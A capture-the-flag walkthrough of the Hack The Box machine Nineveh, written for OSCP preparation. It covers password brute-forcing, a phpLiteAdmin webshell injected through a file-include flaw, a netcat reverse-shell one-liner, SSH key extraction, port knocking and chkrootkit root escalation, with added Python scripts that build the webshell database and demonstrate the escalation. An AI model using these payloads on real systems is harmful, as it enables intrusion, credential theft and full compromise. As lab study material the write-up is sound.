OSCP PREPARATIONS – HTB Nineveh

Nineveh is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the target's services.
Classic Scan

Full port scan

The scan shows two open ports: 80/tcp (http, Apache httpd) and 443/tcp (ssl/http, Apache httpd). No SSH port is reported, which becomes important later.
We continue enumerating both services through the browser.
Port 80

A Gobuster scan found the /department directory, which hosts a login page.

We tried default credentials on the login page and tested its parameters for SQL injection, without result.
The form does leak which field is wrong: entering the username muhammed returns an "invalid username" message, while entering admin returns an "invalid password" message. That confirms admin is a valid account, so we brute-force its password with hydra.

The brute-force attack succeeds with the credentials
login: admin password: 1q2w3e4r5t

We log in successfully but find little of interest. The only notable item is the Notes section, whose content is loaded through a file path passed in a GET parameter in the URL, a candidate for local file inclusion. We note this and move on to port 443.

Port 443

The page source gives nothing useful, so we run a Gobuster scan.
Gobuster scan

The directory scan found /db.

This is a login page that asks only for a password, so let's try a brute-force attack with hydra here too.

Hydra finds the credential for host 10.10.10.43: password: password123.
Let's log in with it.

This gets us into the phpLiteAdmin v1.9 panel. Let's check searchsploit for known vulnerabilities in this version.

searchsploit lists a remote PHP code injection for phpLiteAdmin 1.9.

The weakness is that phpLiteAdmin lets a user create a database with any file name, including a .php extension, and SQLite stores table definitions verbatim inside the file. PHP code placed in a table field's default value therefore ends up as plain text inside a file that the web server will execute if it is ever included.
Let's apply the steps in order:
1- Create a database named hack.php.
2- Create a table in that database with a text field whose default value is the PHP code we want to run (for example, a one-liner that passes a request parameter to system()).
3- Get the web server to execute hack.php.
Once the file is executed, our command runs.

Here is the final version

To execute the file we now need a request over http, that is, through the Notes page in the /department directory on port 80, which includes the file named in its URL parameter.
It did not work when we named the file nineveh.php: the include only accepts a path that contains the string ninevehNotes.
Let's see if our PHP code runs when the file name contains ninevehNotes, as in the default file name ninevehNotes.txt.

As you can see, we now have command injection.
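The following is an added example, not code from the page or from phpLiteAdmin. It reproduces offline the database the steps above create, so you can see that the PHP payload sits as plain text inside the SQLite file, and it models the file-name check that made nineveh.php fail. Assumptions not stated on the page: phpLiteAdmin writes its databases under /var/tmp, the Notes page is /department/manage.php, and its notes parameter is accepted whenever the path contains the substring ninevehNotes (modelled here as a plain substring test). Files are written to a temp directory rather than /var/tmp.

```python
"""Added example: craft a phpLiteAdmin-style .php SQLite database offline and
model the ninevehNotes include check.  Not the page's or phpLiteAdmin's code."""
import os
import sqlite3
import tempfile
from urllib.parse import urlencode

# Same shape as the searchsploit PoC payload; double quotes so it survives
# inside a single-quoted SQL literal.
PAYLOAD = '<?php system($_GET["cmd"]); ?>'


def make_webshell_db(directory=None, name="ninevehNotes.php"):
    """Create a SQLite file whose raw bytes contain PAYLOAD.

    SQLite keeps the CREATE TABLE text verbatim in sqlite_master, so a DEFAULT
    value lands in the file as plain text.  When PHP includes the file it
    echoes the binary noise and executes the <?php ... ?> block."""
    directory = directory or tempfile.mkdtemp()
    path = os.path.join(directory, name)
    con = sqlite3.connect(path)
    con.execute(f"CREATE TABLE notes (shell TEXT DEFAULT '{PAYLOAD}')")
    con.commit()
    con.close()
    return path


def contains_php_tag(path):
    """True if the file is a SQLite database that carries the PHP payload."""
    with open(path, "rb") as f:
        data = f.read()
    return data.startswith(b"SQLite format 3") and PAYLOAD.encode() in data


def include_allowed(notes_param):
    """Assumed model of the manage.php filter: the path only has to contain
    the string.  This is why nineveh.php failed and ninevehNotes.php worked."""
    return "ninevehNotes" in notes_param


def build_request_url(manage_url, db_path, cmd):
    """URL for the include plus the command, URL-encoded as Burp must send it
    (spaces, ;, |, > and quotes in a reverse-shell one-liner break it otherwise)."""
    return manage_url + "?" + urlencode({"notes": db_path, "cmd": cmd})


if __name__ == "__main__":
    db = make_webshell_db()
    print(db, contains_php_tag(db))
    # Hypothetical target layout (assumption, see lead-in).
    print(build_request_url("http://10.10.10.43/department/manage.php",
                            "/var/tmp/ninevehNotes.php", "id"))
```

Running it prints the temp path of the crafted database and True, then the encoded URL. The substring model also explains the alternative many people use instead of renaming the file: any path that merely contains ninevehNotes passes the check.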

Now let's get ourselves a reverse shell.
We first ran the ls command to confirm execution, then used the following one-liner:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
We send the command through Burp Suite (URL-encoded, since the spaces and shell metacharacters would otherwise break the request),
with nc listening on port 4747 in the background.

This is how we got our shell.

The www-data shell cannot read the user or root flag, so we move on to local enumeration.

/var/www/ssl/secure_notes/nineveh.png
This image has an SSH private key embedded in it, readable with strings.
We cannot pull it to our machine with scp, so we transfer the file with nc.
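An added example, not the page's own code, of carving the key out of the image once it has been transferred: it scans the raw bytes for a PEM block, which is exactly what strings shows, and writes it with mode 0600, because ssh refuses a key file that is readable by others. The PNG bytes below are constructed for the example and the key body is filler, not the key from the box.

```python
"""Added example: extract a PEM private key embedded in a binary file
(nineveh.png on this box) and save it with permissions ssh accepts."""
import os
import re
import stat
import tempfile

# Constructed sample: a PNG-looking blob with a PEM block appended after the
# image data.  The key body is filler, not a real key.
SAMPLE_PNG = (
    b"\x89PNG\r\n\x1a\n" + bytes(range(40)) + b"IEND\xaeB`\x82"
    + b"-----BEGIN RSA PRIVATE KEY-----\n"
    + b"MIIEogIBAAKCAQEAFILLERFILLERFILLERFILLERFILLERFILLERFILLERFILLER\n" * 3
    + b"-----END RSA PRIVATE KEY-----\n"
)

# Label is captured so BEGIN and END must match (RSA PRIVATE KEY, OPENSSH
# PRIVATE KEY, ...); DOTALL lets the body span lines.
PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]+)-----\r?\n(.*?)-----END \1-----", re.DOTALL)


def extract_pem_blocks(data):
    """Return every PEM block found in the bytes, with normalised newlines."""
    blocks = []
    for m in PEM_RE.finditer(data):
        label = m.group(1).decode()
        body = m.group(2).replace(b"\r\n", b"\n").decode()
        blocks.append(f"-----BEGIN {label}-----\n{body}-----END {label}-----\n")
    return blocks


def extract_from_file(path):
    with open(path, "rb") as f:
        return extract_pem_blocks(f.read())


def save_key(pem, path=None):
    """Write the key 0600 from the start (not chmod afterwards), so it is never
    world-readable even briefly; ssh rejects keys with looser permissions."""
    if path is None:
        path = os.path.join(tempfile.mkdtemp(), "nineveh.priv")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(pem)
    os.chmod(path, 0o600)  # in case the file already existed with other bits
    return path


def key_mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)


if __name__ == "__main__":
    keys = extract_pem_blocks(SAMPLE_PNG)
    out = save_key(keys[0])
    print(f"{len(keys)} key(s) found, saved to {out} mode {key_mode(out):o}")
```

Point it at the real file with extract_from_file("nineveh.png") after the nc transfer; it handles both the CRLF and LF line endings a transfer may leave behind.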

We saved the SSH key and tried to connect, but the connection fails: the nmap scan never showed SSH as open.

So let’s continue with local enumeration

Here we see that something is configured for ports 571, 290 and 911. This looks like port knocking: the SSH service is hidden from the outside, and the port is opened only when these ports are hit in the specified order. One way to confirm this is to look for the knockd configuration files.

As the configuration file shows, if ports 571, 290 and 911 are hit in that order within a 5-second window (seq_timeout = 5, in seconds), knockd runs the command that opens the SSH port for the knocking host.

Therefore we send the sequence with the knock tool.

Here we can see that the SSH port is now open.
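The following is an added example, not the page's code or the knock tool, showing what the knock tool does under the hood: it parses a knockd.conf, then sends one TCP SYN per port in order, keeping the whole sequence inside seq_timeout. The configuration text is constructed for the example around the sequence and timeout the page reports; the iptables start_command and the closeSSH stanza are assumptions about how such a setup is usually written, not copied from the box.

```python
"""Added example: parse a knockd configuration and perform the knock sequence.
Not the page's code; the config below is constructed (see lead-in)."""
import configparser
import socket
import time

SAMPLE_KNOCKD_CONF = """\
[options]
logfile = /var/log/knockd.log

[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 911, 290, 571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


def parse_knockd(text):
    """Return {rule: {sequence, seq_timeout, tcpflags, start_command}}."""
    # interpolation=None: knockd's %IP% placeholder is not a configparser variable
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    rules = {}
    for section in cp.sections():
        if section == "options" or not cp.has_option(section, "sequence"):
            continue
        sequence = [int(p.strip()) for p in cp.get(section, "sequence").split(",")]
        rules[section] = {
            "sequence": sequence,
            "seq_timeout": float(cp.get(section, "seq_timeout", fallback="5")),
            "tcpflags": cp.get(section, "tcpflags", fallback=""),
            "start_command": cp.get(section, "start_command", fallback=""),
        }
    return rules


def knock(host, sequence, seq_timeout, delay=0.2):
    """Send one SYN per port, in order.  A plain connect() attempt is enough:
    the SYN is what knockd matches (tcpflags = syn), and the RST that a closed
    port sends back does not matter.  Per port we may wait up to `delay` for a
    filtered port plus `delay` of pause, so the whole sequence must fit in
    seq_timeout or knockd discards it and the order has to be restarted."""
    if 2 * delay * len(sequence) >= seq_timeout:
        raise ValueError("sequence cannot complete within seq_timeout; lower delay")
    sent = []
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(delay)
        try:
            s.connect_ex((host, port))
        finally:
            s.close()
        sent.append(port)
        time.sleep(delay)
    return sent


if __name__ == "__main__":
    rules = parse_knockd(SAMPLE_KNOCKD_CONF)
    open_ssh = rules["openSSH"]
    print("knocking", knock("10.10.10.43", open_ssh["sequence"], open_ssh["seq_timeout"]))
```

Note that the closing rule is the same ports in reverse order, so a port scan that happens to touch 911, 290, 571 in that order within the window would shut the door again; knock once, then go straight to ssh.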
Now let’s connect using the ssh key.

With the SSH connection established, we can read the user flag.
This user has no root privileges, so we cannot access the root flag yet.

So we go back to local enumeration.

The Linpeas output points at the /usr/sbin/report-reset.sh file as a possible privilege-escalation path.

It is a cron job that deletes the .txt files in the /report directory. What matters is who runs it: if a root process is involved, we will try to abuse it.
To see the processes running in the background, we upload the pspy tool to the target machine and run it.

The many chkrootkit processes catch our eye; let's see whether searchsploit has an exploit for it.

searchsploit shows a local privilege escalation for chkrootkit: when it runs, it executes a file named /tmp/update if one exists, with the privileges of whoever runs chkrootkit (here, root from the cron job). To use this exploit we do, in order:
We create a file named update in the /tmp directory as a non-root user.
Then we write into this update file a bash script that gives us a shell, and make it executable so chkrootkit can run it.
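An added example, not the page's code or the searchsploit exploit, that shows why this works instead of just doing it: the faulty line from chkrootkit's slapper() check is reproduced below and run from Python against a temp directory, so you can watch a dropped update file get executed. The demo payload only records the uid it ran with; on the real box this is where the reverse shell or a setuid copy of bash goes. The reproduced shell fragment and file list are a reconstruction of the vulnerable check, not copied from the box.

```python
"""Added example: demonstrate the chkrootkit /tmp/update bug in a sandbox dir.
Not the page's code; the shell fragment is a reconstruction of the bug."""
import os
import subprocess
import tempfile

UPDATE_PAYLOAD = """#!/bin/sh
# Demo payload (added example).  On the real box this is where the reverse
# shell goes; here it only records the uid it was executed with.
echo "ran as uid $(id -u)" > "$(dirname "$0")/ran_as.txt"
"""

# Reconstruction of the faulty loop in chkrootkit's slapper() check, with the
# directory passed as $1 instead of /tmp.  file_port is empty, so the shell
# reads `file_port=$file_port $i` not as string building but as
# "run $i with file_port= in its environment": the dropped file is executed.
VULNERABLE_CHECK = r"""
SLAPPER_FILES="$1/.bugtraq $1/.update $1/update $1/.cinik"
file_port=
for i in $SLAPPER_FILES; do
    if [ -f "$i" ]; then
        file_port=$file_port $i
    fi
done
"""


def drop_update(directory):
    """Write the payload as <directory>/update.  It must be executable:
    without the x bit the shell prints 'Permission denied' and moves on."""
    path = os.path.join(directory, "update")
    with open(path, "w") as f:
        f.write(UPDATE_PAYLOAD)
    os.chmod(path, 0o755)
    return path


def run_vulnerable_check(directory):
    """Run the reconstructed check as /bin/sh would; True if update executed."""
    subprocess.run(["/bin/sh", "-c", VULNERABLE_CHECK, "sh", directory],
                   capture_output=True, check=False)
    return os.path.exists(os.path.join(directory, "ran_as.txt"))


def read_result(directory):
    with open(os.path.join(directory, "ran_as.txt")) as f:
        return f.read().strip()


def demo(drop=True):
    """Full round trip in a fresh temp dir; drop=False shows nothing runs
    when no update file exists."""
    directory = tempfile.mkdtemp()
    if drop:
        drop_update(directory)
    return run_vulnerable_check(directory)


if __name__ == "__main__":
    d = tempfile.mkdtemp()
    drop_update(d)
    if run_vulnerable_check(d):
        print("update was executed:", read_result(d))
```

On the target the loop is run by root's cron every minute, so the uid recorded there would be 0; here it is your own, which is the whole point of the demo being safe to run.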

The next time chkrootkit runs, our script executes as root and we get a root shell.
And with it we read the root flag.
